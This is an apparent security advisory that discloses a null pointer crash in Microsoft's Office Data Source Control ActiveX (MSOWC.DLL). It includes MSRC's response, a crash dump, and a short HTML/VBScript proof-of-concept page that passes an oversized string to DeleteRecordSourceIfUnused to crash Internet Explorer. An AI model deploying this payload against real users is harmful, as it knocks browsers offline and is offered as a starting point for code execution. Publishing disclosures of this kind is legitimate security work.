-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

- -----------------------------------------------------------------------------
 Microsoft Office Data Source Control 9.0 (MSOWC.DLL) Null Pointer DoS

 Author: shinnai
 mail:   shinnai[at]autistici[dot]org
 site:   http://www.shinnai.net/

 File:   MSOWC.DLL
 Ver.:   9.0.0.8966
 ProgID: OWC.DataSourceControl.9
 Descr.: Microsoft Office Data Source Control 9.0

 Marked: RegKey Safe for Script: False
         RegKey Safe for Init: False
         Implements IObjectSafety:True
         IDisp Safe: Safe for untrusted: caller

 Member: DeleteRecordSourceIfUnused (ByVal RecordSource As String)

 According to MSRC:
 "In triaging this it appears that this control has alredy had a killbit
  released as part of an OWC patch (MS08-017).
  Also, kill-bitted by IE in
  http://www.microsoft.com/technet/security/advisory/956391.mspx
  Unless I am missing a detail here or if the killbit was unsuccessful,
  the MSRC won't open a new case for this control."

 and:
 "From our assessment this looks to be a non-exploitable null pointer."

 This is a report of the crash:

 Dump:
 3AD28D0A   . 8B40 50        MOV EAX,DWORD PTR DS:[EAX+50]; <== CRASH

 Registers:
 EAX 00000000
 ECX 0292009C
 EDX 0021FFF2
 EBX 029200FC
 ESP 0161D258
 EBP 0161D284
 ESI 0161D278
 EDI 0161D25C
 EIP 3AD28D0A MSOWC.3AD28D0A

 Stack:
 ESP ==>  > 00000008
 ESP+4    > 0292009C
 ESP+8    > 3AD28CDA  RETURN to MSOWC.3AD28CDA from MSOWC.3AD2A6C4
 ESP+C    > 01F09C64  UNICODE "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA..."

 So if someone find a way to manipulate EAX, code execution is possible.

 This was written for educational purpose. Use it at your own risk.
 Author will be not responsible for any damage.

 Tested on Windows XP Professional SP3 full patched, with Internet Explorer 8
- ------------------------------------------------------------------------------

<object classid='clsid:0002E533-0000-0000-C000-000000000046' id='test'></object>

<script language='vbscript'>
 test.DeleteRecordSourceIfUnused String(1024, "A")
</script>

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.10 (MingW32)

iQIcBAEBAgAGBQJK7+4+AAoJEGLxkZuDw5+s6VwP/0D8HgkLDQS3kd8uD+EYv4Vy
9/w0k90y2lweRZCduKg+lz6hUAtPSLxecVMe8Wh/0HvIabhj/juUImVH5QxILuYZ
D67Q8KLoilwL0FAvWdgIiHCIE/5StwvmcHOs1chhUgGnVrI/7cxN8u1dx064eJ6G
KQenwcC42LfNJNlGIUREdkeWdo/XOCefmuGjPNv8HIbh3/0konEExKbitw+xSKId
tIJlPEYOuHYMEziiyxfTnRVbo9c5PGoo7YGIyk6YcpXTCj37AggJaRx7EgL4Wzj2
E/WXIeyjsQfmyntgrpIDuNjA3Wp0zZDVTJN8LDyzwb/aexD9oXM+t0de4Yu/WBZ4
Wvi3ZnkG2dhGxhDGUOCmrNykeF3/YfsJuz2HHxD3enDI6sNyxHNXnjF9CiNJfm+O
dIqvlA9Qom1yHqoZivAwx7zp4+zPcpSNhLR3kf5VGgKTKqSPOEZterufMICjBK64
PlZU/i3rFJ7bH3jwXjwSfwhVgzAboaKFtoE0v6yQlizuOMZGb9M9C2XAjDSxp7yk
CZC6ZAxvM3VyI9cJ67wX4AB+0D/WtTUP74nuxywbXkY4DrAHlEStYCa+O8EFbwQy
X9iJ9cYihDSB1jgKykybrbGGVQfjacm/GT/L9CLjoOj82LreSVJldh9P0lsgmCP4
MmF+lIUX4OoYHuqdpJsb
=gH6Q
-----END PGP SIGNATURE-----